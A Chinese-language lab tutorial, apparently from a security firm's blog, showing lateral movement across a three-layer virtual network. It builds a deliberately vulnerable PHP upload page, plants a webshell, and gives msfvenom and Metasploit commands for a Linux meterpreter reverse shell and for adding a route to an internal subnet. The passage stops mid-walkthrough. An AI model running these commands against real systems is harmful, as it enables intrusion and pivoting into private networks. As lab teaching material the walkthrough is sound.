文章插图
近年来,攻击者潜伏在企业内网进行攻击的安全事件屡见不鲜,攻击者在经常会企业的内网进行横向渗透,令防守方防不胜防 。因此,我们应该严格控制好网络区域之间的访问规则,加大攻击横向渗透的阻力 。本文由锦行科技的安全研究团队提供,旨在通过实验演示进一步了解攻击者是如何在多层内网进行的渗透 。
1.实验简介网络拓扑图
文章插图
渗透机:win10+kali
第一层靶机 (外网web服务器): linux
第二场靶机 (内网web服务器): Linux
第三层靶机 (内网办公机) : win7
用三层网络来模拟内外网环境,主要了解MSF、内网转发等 。
2.环境搭建第一层网络把渗透机kali和win10网卡1设置选择VMnet1:
文章插图
靶机Linux网卡1设置选择VMnet1,添加网卡2 设置选择VMnet2:
文章插图
第二层网络将第二台靶机Linux网卡1设置选择VMnet2,添加网卡2 设置选择VMnet3:
文章插图
第三层网络将靶机win7网卡1设置选择VMnet3:
文章插图
再配置好各台机器对应IP即可 。
最后在第一台Linux和第二台Linux上搭建一个php上传页面,设为存在文件上传漏洞的web页面,以便后续的拿shell进行内网渗透 。
第一台Linux
文章插图
第二台Linux
文章插图
3.实验过程第一层靶机win10访问http://192.168.85.131/直接上传一句话木马
文章插图
蚁剑连接
文章插图
【我猜你也在找内网渗透,这篇难道还不够你嚼烂?】
文章插图
进一步做内网渗透,上传msf后门打开kali msfconsole 输入msfvenom -p
linux/x64/meterpreter/reverse_tcp LHOST=192.168.85.128 LPORT=4444 -f elf > mshell.elf
生成一个名为mshell.elf的msf后门文件
文章插图
蚁剑把后门文件上传到Linux靶机
文章插图
返回msf 开启监听use exploit/multi/handler 使用监听模块
set payload
linux/x64/meterpreter/reverse_tcp 使用和木马相同的payload
set lhost 192.168.85.128 kaili 的ip
set lport 4444 木马的端口
run 执行
文章插图
蚁剑打开虚拟终端cd到后门文件的目录下,执行后门文件,输入
chmod 777 mshell.elf 加执行权限
./mshell.elf 执行文件
文章插图
Kail接受到MSF会话
文章插图
输入ifconfig,发现第二层172.10.10.0/24网段
文章插图
添加路由background 将会话转到后台
route add 172.10.10.0/24 1
添加 172.10.10.0/24网段 使用session1
route print 查看路由表
推荐阅读
- 微信QQ头像,可以自定义啦
- 尿路感染喝槐米茶好吗,槐米茶能天天喝吗你知道槐米茶的功能功效吗
- 历史上的今天10月21日,历史上的10月20日
- 一文带你搞懂RPC到底是个啥
- 家居风水之财运风水
- 翡翠手镯|某女子买了两块翡翠手镯,价格还不到两千块钱,你说这是真的吗?
- |关于赚钱这个道理你一定要懂,赚钱能力不仅仅是考验智商
- 传奇3|传奇3:三职业究竟谁更强一点你知道吗?
- 减肥健美操,你跳对了吗
- 中草药6000种图解,图解教你正确的玉器挂件礼品绑法